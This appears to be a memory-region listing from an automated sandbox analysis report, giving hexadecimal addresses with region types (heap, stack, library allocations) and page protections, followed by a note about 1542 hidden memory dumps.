heap
page read and write
35AD000
trusted library allocation
page read and write
F00000
trusted library allocation
page read and write
3D9000
heap
page read and write
1B550000
heap
page read and write
37DD000
heap
page read and write
37B000
heap
page read and write
7FE898EB000
trusted library allocation
page read and write
3B6F000
heap
page read and write
7FE89AC2000
trusted library allocation
page read and write
CE0000
heap
page read and write
4A6D000
heap
page read and write
3C25000
heap
page read and write
4F84000
heap
page read and write
3800000
heap
page read and write
4CDA000
heap
page read and write
13B000
heap
page read and write
4FBE000
heap
page read and write
199000
heap
page read and write
51B0000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
36EC000
heap
page read and write
3C24000
heap
page read and write
1A1000
heap
page read and write
1C80000
heap
page read and write
37C0000
heap
page read and write
35A1000
trusted library allocation
page read and write
1FA000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
4D21000
heap
page read and write
2BD0000
heap
page read and write
5209000
heap
page read and write
3CDA000
stack
page read and write
500000
heap
page read and write
42EF000
stack
page read and write
2FCC000
stack
page read and write
1DB000
heap
page read and write
1EA000
heap
page read and write
3E6000
heap
page read and write
10000
heap
page read and write
288000
heap
page read and write
51EE000
heap
page read and write
3C4F000
heap
page read and write
4F9B000
heap
page read and write
7FE898D4000
trusted library allocation
page read and write
1C1C6000
heap
page read and write
1C3DA000
heap
page read and write
1A1A8000
heap
page read and write
7FE898EB000
trusted library allocation
page read and write
12151000
trusted library allocation
page read and write
7FE89990000
trusted library allocation
page execute and read and write
1DB000
heap
page read and write
3818000
heap
page read and write
28B000
heap
page read and write
4905000
heap
page read and write
47CC000
heap
page read and write
1CA70000
heap
page read and write
1C12E000
stack
page read and write
2E4000
heap
page read and write
10000
heap
page read and write
4C50000
heap
page read and write
2CF000
heap
page read and write
210F000
stack
page read and write
4F75000
heap
page read and write
3BD0000
heap
page read and write
38D000
heap
page read and write
7FE89C40000
trusted library allocation
page read and write
1EF000
trusted library allocation
page read and write
369F000
stack
page read and write
2E7000
heap
page read and write
4F7E000
heap
page read and write
1270000
unkown
page readonly
8FE000
stack
page read and write
52F0000
heap
page read and write
520A000
heap
page read and write
5EF000
heap
page read and write
5E4000
heap
page read and write
4979000
trusted library allocation
page read and write
3C2B000
heap
page read and write
4F8F000
heap
page read and write
4FC9000
heap
page read and write
2F3000
heap
page read and write
37E0000
heap
page read and write
5A0000
heap
page read and write
36D8000
heap
page read and write
1A1D0000
heap
page execute and read and write
4F31000
heap
page read and write
13E000
heap
page read and write
3C1E000
heap
page read and write
3920000
heap
page read and write
4FC9000
heap
page read and write
1C427000
heap
page read and write
4CCC000
heap
page read and write
4FC9000
heap
page read and write
7FE89A91000
trusted library allocation
page execute and read and write
3B5D000
heap
page read and write
43E0000
trusted library allocation
page read and write
454000
heap
page read and write
3C4F000
heap
page read and write
4D02000
heap
page read and write
3BEE000
heap
page read and write
7FE89B6D000
trusted library allocation
page read and write
7FE89AD0000
trusted library allocation
page read and write
4D8000
heap
page read and write
197000
direct allocation
page read and write
4CC9000
heap
page read and write
122C1000
trusted library allocation
page read and write
1C17A000
heap
page read and write
26B4000
trusted library allocation
page read and write
3AD0000
heap
page read and write
22B6000
trusted library allocation
page read and write
1C2FC000
stack
page read and write
5209000
heap
page read and write
3864000
heap
page read and write
4D09000
heap
page read and write
7FE899B6000
trusted library allocation
page execute and read and write
7FE89A82000
trusted library allocation
page read and write
3AA0000
trusted library allocation
page read and write
7FE89B10000
trusted library allocation
page read and write
213000
trusted library allocation
page read and write
1C16000
heap
page read and write
14C000
stack
page read and write
130000
trusted library allocation
page read and write
37F000
trusted library allocation
page read and write
20000
heap
page read and write
3900000
trusted library allocation
page execute
1BF1B000
heap
page read and write
4E2A000
heap
page read and write
4A68000
heap
page read and write
37CC000
heap
page read and write
160000
heap
page read and write
3700000
trusted library allocation
page read and write
51EE000
heap
page read and write
3804000
heap
page read and write
1B180000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
168000
heap
page read and write
3850000
heap
page read and write
4E32000
heap
page read and write
7FE89AB0000
trusted library allocation
page execute and read and write
4F8F000
heap
page read and write
4F8F000
heap
page read and write
7FE899B6000
trusted library allocation
page execute and read and write
4970000
trusted library allocation
page read and write
4D0D000
heap
page read and write
20000
heap
page read and write
4FD2000
heap
page read and write
1CE7000
heap
page read and write
1C6000
heap
page read and write
4E2A000
heap
page read and write
917000
heap
page read and write
1A6000
heap
page read and write
5190000
heap
page read and write
AE000
heap
page read and write
10000
heap
page read and write
274A000
trusted library allocation
page read and write
37E0000
heap
page read and write
179000
heap
page read and write
5A3000
heap
page read and write
70000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
38D000
heap
page read and write
38F000
heap
page read and write
1A99F000
stack
page read and write
373000
heap
page read and write
4FD2000
heap
page read and write
3F6000
heap
page read and write
1AB5F000
heap
page read and write
4F7E000
heap
page read and write
1B0000
trusted library allocation
page read and write
7FE89AE8000
trusted library allocation
page read and write
3990000
trusted library allocation
page read and write
522000
heap
page read and write
3ED000
heap
page read and write
392000
heap
page read and write
3E6000
heap
page read and write
1C67F000
stack
page read and write
1A1F2000
heap
page read and write
4F7F000
heap
page read and write
130000
heap
page read and write
37DB000
heap
page read and write
1B17F000
stack
page read and write
1A1000
heap
page read and write
2B00000
trusted library allocation
page read and write
2160000
heap
page read and write
400000
heap
page read and write
41C000
heap
page read and write
3F4000
heap
page read and write
31AE000
trusted library allocation
page read and write
4AAD000
heap
page read and write
4F78000
heap
page read and write
4D20000
heap
page read and write
1DB000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
5B9000
heap
page read and write
4D3000
heap
page read and write
1EE0000
direct allocation
page read and write
3C30000
heap
page read and write
46A0000
trusted library allocation
page read and write
5E0000
heap
page read and write
1C4E0000
heap
page read and write
7FE89996000
trusted library allocation
page read and write
4CDA000
heap
page read and write
7FE8999C000
trusted library allocation
page execute and read and write
406000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
480D000
heap
page read and write
47CB000
heap
page read and write
35AA000
trusted library allocation
page read and write
7FE898E4000
trusted library allocation
page read and write
28C5000
heap
page read and write
3E4000
heap
page read and write
4FD2000
heap
page read and write
4BE000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
1E0000
trusted library allocation
page read and write
467000
heap
page read and write
48B6000
heap
page read and write
4E3A000
heap
page read and write
486000
heap
page read and write
4F01000
heap
page read and write
199000
heap
page read and write
477000
direct allocation
page read and write
1BEE0000
heap
page read and write
100000
heap
page read and write
7FE89BF0000
trusted library allocation
page read and write
4D3000
heap
page read and write
371000
heap
page read and write
4A01000
heap
page read and write
4EDA000
heap
page read and write
1C740000
heap
page read and write
4C01000
heap
page read and write
3B6C000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
4C58000
heap
page read and write
384D000
heap
page read and write
4C87000
heap
page read and write
4B87000
heap
page read and write
4E2A000
heap
page read and write
1E60000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
1A38C000
stack
page read and write
3864000
heap
page read and write
1A8000
heap
page read and write
7FE89B77000
trusted library allocation
page read and write
3EA000
heap
page read and write
37CC000
heap
page read and write
3D00000
trusted library allocation
page read and write
1FB8000
stack
page read and write
7FE89B50000
trusted library allocation
page read and write
4F33000
heap
page read and write
403F000
stack
page read and write
1AFAE000
stack
page read and write
393000
heap
page read and write
33F000
heap
page read and write
220000
heap
page execute and read and write
4CDD000
heap
page read and write
3EBB000
stack
page read and write
2951000
trusted library allocation
page read and write
1B6000
heap
page read and write
4CDA000
heap
page read and write
3EA000
heap
page read and write
4F84000
heap
page read and write
4CDA000
heap
page read and write
4CC3000
heap
page read and write
359E000
trusted library allocation
page read and write
275F000
trusted library allocation
page read and write
4CDA000
heap
page read and write
4CC3000
heap
page read and write
3844000
heap
page read and write
7FE89A8C000
trusted library allocation
page read and write
1B4000
heap
page read and write
3FC000
heap
page read and write
4E30000
heap
page read and write
4D09000
heap
page read and write
2343000
trusted library allocation
page read and write
3BC7000
heap
page read and write
119000
heap
page read and write
3862000
heap
page read and write
4F80000
heap
page read and write
1A1CF000
stack
page read and write
7FE89980000
trusted library allocation
page read and write
430000
heap
page read and write
59AE000
trusted library allocation
page read and write
4760000
heap
page read and write
3576000
trusted library allocation
page read and write
2B40000
trusted library allocation
page read and write
465000
heap
page read and write
4F99000
heap
page read and write
37B000
heap
page read and write
1A5CE000
stack
page read and write
5B7000
heap
page read and write
298F000
trusted library allocation
page read and write
4D02000
heap
page read and write
3650000
trusted library allocation
page read and write
4CD7000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
480D000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
520000
heap
page read and write
4CDA000
heap
page read and write
7FE898D3000
trusted library allocation
page execute and read and write
4F99000
heap
page read and write
19A000
heap
page read and write
4F8F000
heap
page read and write
31B000
heap
page read and write
300000
heap
page read and write
3588000
trusted library allocation
page read and write
542000
heap
page read and write
2357000
trusted library allocation
page read and write
51EF000
heap
page read and write
1FC0000
direct allocation
page read and write
1AE0F000
stack
page read and write
53C000
heap
page read and write
4F71000
heap
page read and write
4F9C000
heap
page read and write
576000
heap
page read and write
3E4E000
stack
page read and write
4CFA000
heap
page read and write
5EB000
heap
page read and write
5000000
trusted library allocation
page read and write
4150000
trusted library allocation
page read and write
35AB000
trusted library allocation
page read and write
359A000
trusted library allocation
page read and write
4BF000
heap
page read and write
143000
heap
page read and write
4E32000
heap
page read and write
2D7000
heap
page read and write
1DA0000
direct allocation
page read and write
35AA000
trusted library allocation
page read and write
7FE898E2000
trusted library allocation
page read and write
4B80000
heap
page read and write
1B04F000
stack
page read and write
1F3F000
stack
page read and write
51EF000
heap
page read and write
199000
heap
page read and write
3C3E000
heap
page read and write
29B3000
trusted library allocation
page read and write
2F0000
trusted library allocation
page read and write
1C0000
heap
page read and write
1BFF0000
heap
page read and write
3844000
heap
page read and write
36D000
heap
page read and write
5B4000
heap
page read and write
1BEE5000
heap
page read and write
4F99000
heap
page read and write
BF000
heap
page read and write
2B0000
trusted library allocation
page read and write
5171000
heap
page read and write
48B000
direct allocation
page read and write
7FE898FB000
trusted library allocation
page read and write
4980000
heap
page read and write
4B84000
heap
page read and write
4D09000
heap
page read and write
1C457000
heap
page read and write
486000
heap
page read and write
3C37000
heap
page read and write
4CDE000
heap
page read and write
4CDA000
heap
page read and write
4FC8000
heap
page read and write
3ACE000
trusted library allocation
page read and write
5590000
heap
page read and write
3C6F000
stack
page read and write
2C4000
heap
page read and write
3829000
heap
page read and write
3595000
trusted library allocation
page read and write
7FE89B30000
trusted library allocation
page read and write
2C0000
heap
page read and write
370000
trusted library allocation
page read and write
1B1B6000
heap
page read and write
4F9A000
heap
page read and write
3C3D000
heap
page read and write
283E000
stack
page read and write
4C57000
heap
page read and write
4A00000
heap
page read and write
4902000
heap
page read and write
3867000
heap
page read and write
4E27000
heap
page read and write
5171000
heap
page read and write
4F20000
heap
page read and write
4D09000
heap
page read and write
393000
heap
page read and write
1A6000
heap
page read and write
3C39000
heap
page read and write
7FE898DD000
trusted library allocation
page execute and read and write
5A7000
heap
page read and write
4A5C000
heap
page read and write
4C00000
heap
page read and write
106000
heap
page read and write
3C25000
heap
page read and write
311000
heap
page read and write
4AA000
heap
page read and write
43F000
heap
page read and write
1A1000
heap
page read and write
4C57000
heap
page read and write
4F99000
heap
page read and write
4D02000
heap
page read and write
3B6B000
trusted library allocation
page read and write
370000
heap
page read and write
480E000
heap
page read and write
3EC000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
3586000
trusted library allocation
page read and write
483A000
trusted library allocation
page read and write
1C422000
heap
page read and write
3480000
heap
page read and write
20A0000
heap
page execute and read and write
36E0000
heap
page read and write
2748000
trusted library allocation
page read and write
1AF9E000
stack
page read and write
4F7E000
heap
page read and write
7FE89C00000
trusted library allocation
page read and write
37DE000
heap
page read and write
2FF000
trusted library allocation
page read and write
261F000
stack
page read and write
4F91000
heap
page read and write
3BD1000
heap
page read and write
4F84000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
38BD000
heap
page read and write
4C50000
heap
page read and write
1AB000
direct allocation
page read and write
1A1000
heap
page read and write
5599000
heap
page read and write
190000
heap
page read and write
357A000
trusted library allocation
page read and write
325E000
stack
page read and write
2F3000
heap
page read and write
4979000
trusted library allocation
page read and write
2957000
trusted library allocation
page read and write
4CD5000
heap
page read and write
5209000
heap
page read and write
4C4E000
heap
page read and write
3D80000
trusted library allocation
page read and write
3EB000
heap
page read and write
321000
heap
page read and write
3F1000
heap
page read and write
4979000
trusted library allocation
page read and write
1BA0000
heap
page read and write
40DB000
stack
page read and write
4FCB000
heap
page read and write
2CDA000
stack
page read and write
301000
stack
page read and write
7FE89AD8000
trusted library allocation
page read and write
10000
heap
page read and write
4F99000
heap
page read and write
59C000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
7FE898E0000
trusted library allocation
page read and write
3C4B000
heap
page read and write
3C3D000
heap
page read and write
2962000
trusted library allocation
page read and write
4B56000
heap
page read and write
3829000
heap
page read and write
3AE3000
heap
page read and write
1E47000
direct allocation
page read and write
3C2B000
heap
page read and write
41E0000
trusted library allocation
page read and write
5AE000
heap
page read and write
3BF000
heap
page read and write
4FC4000
heap
page read and write
465000
heap
page read and write
5570000
trusted library allocation
page read and write
3C3B000
heap
page read and write
4B78000
heap
page read and write
4F82000
heap
page read and write
68D000
heap
page read and write
3DE000
heap
page read and write
4BF000
heap
page read and write
2E0000
trusted library allocation
page read and write
236F000
stack
page read and write
389000
heap
page read and write
2A4000
heap
page read and write
4C50000
heap
page read and write
21F000
heap
page read and write
1B166000
heap
page read and write
3B4000
heap
page read and write
3571000
trusted library allocation
page read and write
58F000
heap
page read and write
3C3D000
heap
page read and write
2BD5000
heap
page read and write
38B4000
heap
page read and write
3C4F000
heap
page read and write
18F000
heap
page read and write
504000
heap
page read and write
4FC9000
heap
page read and write
3290000
heap
page read and write
4B7E000
heap
page read and write
3B70000
heap
page read and write
1BEAC000
stack
page read and write
1C27F000
stack
page read and write
103000
stack
page read and write
392000
heap
page read and write
392000
heap
page read and write
51EE000
heap
page read and write
3C32000
heap
page read and write
2953000
trusted library allocation
page read and write
4F99000
heap
page read and write
4BF5000
heap
page read and write
3D9000
heap
page read and write
4FCB000
heap
page read and write
7FE89A83000
trusted library allocation
page read and write
2A7000
heap
page read and write
1B14E000
stack
page read and write
35AE000
trusted library allocation
page read and write
4D09000
heap
page read and write
4F7F000
heap
page read and write
1C23E000
stack
page read and write
4D03000
heap
page read and write
5A4000
heap
page read and write
4CD5000
heap
page read and write
3CF4000
trusted library allocation
page read and write
2672000
trusted library allocation
page read and write
3860000
heap
page read and write
2B7000
heap
page read and write
1B04C000
stack
page read and write
3658000
trusted library allocation
page read and write
4FC9000
heap
page read and write
1EF000
heap
page read and write
4190000
trusted library allocation
page read and write
14E000
heap
page read and write
10000
heap
page read and write
3C0000
heap
page read and write
4C57000
heap
page read and write
51EF000
heap
page read and write
36DF000
heap
page read and write
45C0000
heap
page read and write
3450000
remote allocation
page read and write
179000
heap
page read and write
5171000
heap
page read and write
431C000
stack
page read and write
7FE89B20000
trusted library allocation
page read and write
3430000
trusted library allocation
page read and write
559000
heap
page read and write
7FE898E0000
trusted library allocation
page read and write
1AE000
heap
page read and write
48C000
heap
page read and write
2751000
trusted library allocation
page read and write
2684000
heap
page read and write
2C0B000
heap
page read and write
1E80000
heap
page read and write
436000
heap
page read and write
4A66000
heap
page read and write
2347000
trusted library allocation
page read and write
4F9A000
heap
page read and write
3A30000
trusted library allocation
page read and write
2B44000
heap
page read and write
1C690000
heap
page read and write
4F2F000
heap
page read and write
4C66000
heap
page read and write
1160000
heap
page read and write
48D000
direct allocation
page read and write
3C4A000
heap
page read and write
1FC7000
direct allocation
page read and write
3B6B000
heap
page read and write
3583000
trusted library allocation
page read and write
22B4000
trusted library allocation
page read and write
5570000
trusted library allocation
page read and write
1CE4000
heap
page read and write
37DE000
heap
page read and write
5DE000
heap
page read and write
357B000
trusted library allocation
page read and write
4CD5000
heap
page read and write
385F000
heap
page read and write
3C30000
heap
page read and write
7FE89AD4000
trusted library allocation
page read and write
3E6000
heap
page read and write
4AC3000
heap
page read and write
3B6B000
trusted library allocation
page read and write
220000
heap
page read and write
4E7B000
heap
page read and write
37DA000
heap
page read and write
4D0E000
heap
page read and write
357E000
trusted library allocation
page read and write
35D0000
heap
page read and write
368000
stack
page read and write
480D000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
4F9B000
heap
page read and write
1F36000
heap
page read and write
3C34000
heap
page read and write
4A6F000
heap
page read and write
334000
heap
page read and write
37DA000
heap
page read and write
4E30000
heap
page read and write
1A6E9000
stack
page read and write
3841000
heap
page read and write
1B2C0000
heap
page read and write
2B4000
heap
page read and write
2764000
trusted library allocation
page read and write
7FE89AB2000
trusted library allocation
page read and write
684000
heap
page read and write
2DF000
heap
page read and write
4FC8000
heap
page read and write
52F0000
heap
page read and write
4E32000
heap
page read and write
33F000
heap
page read and write
3C4F000
heap
page read and write
4959000
heap
page read and write
4FCB000
heap
page read and write
1D90000
heap
page read and write
7FE89AC4000
trusted library allocation
page read and write
207F000
stack
page read and write
12090000
trusted library allocation
page read and write
1B0CC000
stack
page read and write
34B6000
heap
page read and write
51EE000
heap
page read and write
522000
heap
page read and write
47C0000
trusted library allocation
page read and write
342E000
stack
page read and write
359E000
trusted library allocation
page read and write
1000000
trusted library allocation
page read and write
2F3000
heap
page read and write
461000
heap
page read and write
10000
heap
page read and write
7FE89C00000
trusted library allocation
page read and write
7FE89A70000
trusted library allocation
page read and write
287A000
trusted library allocation
page read and write
4F7E000
heap
page read and write
1013000
trusted library allocation
page read and write
1A6CF000
stack
page read and write
1AAC9000
stack
page read and write
23EE000
trusted library allocation
page read and write
28C1000
trusted library allocation
page read and write
4FD2000
heap
page read and write
4F99000
heap
page read and write
2940000
remote allocation
page read and write
144000
heap
page read and write
7FE89AD4000
trusted library allocation
page read and write
36D9000
heap
page read and write
7FE898ED000
trusted library allocation
page execute and read and write
4FC4000
heap
page read and write
4F99000
heap
page read and write
45D000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
120B1000
trusted library allocation
page read and write
150000
direct allocation
page read and write
7FE89BA0000
trusted library allocation
page read and write
38B2000
heap
page read and write
4970000
trusted library allocation
page read and write
3E6000
heap
page read and write
780000
heap
page read and write
520A000
heap
page read and write
49C8000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
1FE000
heap
page read and write
1C453000
heap
page read and write
528A000
heap
page read and write
12081000
trusted library allocation
page read and write
3E4000
heap
page read and write
190000
direct allocation
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
7FE89A90000
trusted library allocation
page execute and read and write
3C1E000
heap
page read and write
36D6000
heap
page read and write
384C000
heap
page read and write
1F00000
direct allocation
page read and write
7FE89AF0000
trusted library allocation
page read and write
6DAE000
trusted library allocation
page read and write
There are 1542 hidden memdumps, click here to show them.